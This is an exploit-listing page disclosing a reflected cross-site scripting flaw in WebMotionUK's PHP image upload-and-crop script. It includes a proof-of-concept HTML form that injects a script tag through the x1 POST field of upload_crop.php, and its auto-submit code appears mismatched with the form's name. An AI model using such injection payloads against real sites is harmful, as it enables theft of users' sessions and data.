WebMotionUK CMS Reflected Cross site scripting(xss) Vulnerability

2017.07.26
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: WebMotionUK CMS Reflected Cross site scripting(xss) Vulnerability # Date: July 25, 2017 # Author: Ashiyane Digital Security Team # Vendor Homepage : http://www.webmotionuk.com/ # Download Link : http://www.webmotionuk.com/php-jquery-image-upload-and-crop/ # Version : Ver 1.2 & Ver 1.0 # CWE : 79 # Category: Web Application # Tested On : Windows 10 / Chrome ______________________ Vulnerability FILE : upload_crop.php ______________________ Vulnerability Method and Variable: POST / x1,x2,y1,y2,w,idp and file_extp ______________________ Vulnerability Path : http://localhost/[PATH]/upload_crop.php ______________________ Vulnerability code and Exploit: <html> <body onload="document.exploit.submit()"> <form name="thumbnail" action="http://localhost/[PATH]/upload_crop.php" method="post"> <input type="hidden" name="x1" value="'/><script>alert(1)</script>" id="x1" /> <input type="hidden" name="y1" value="" id="y1" /> <input type="hidden" name="x2" value="" id="x2" /> <input type="hidden" name="y2" value="" id="y2" /> <h2>Ancho</h2> <input type="text" name="w" value="" id="w" /><br /> <h2>Ancho</h2> <input type="text" name="h" value="" id="h" /><br /> <input type='hidden' name='idp' value=''/> <input type='hidden' name='file_extp' value=''/><br /> </form> </body> </html> _____________________________________ __________ HackFanS __________


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top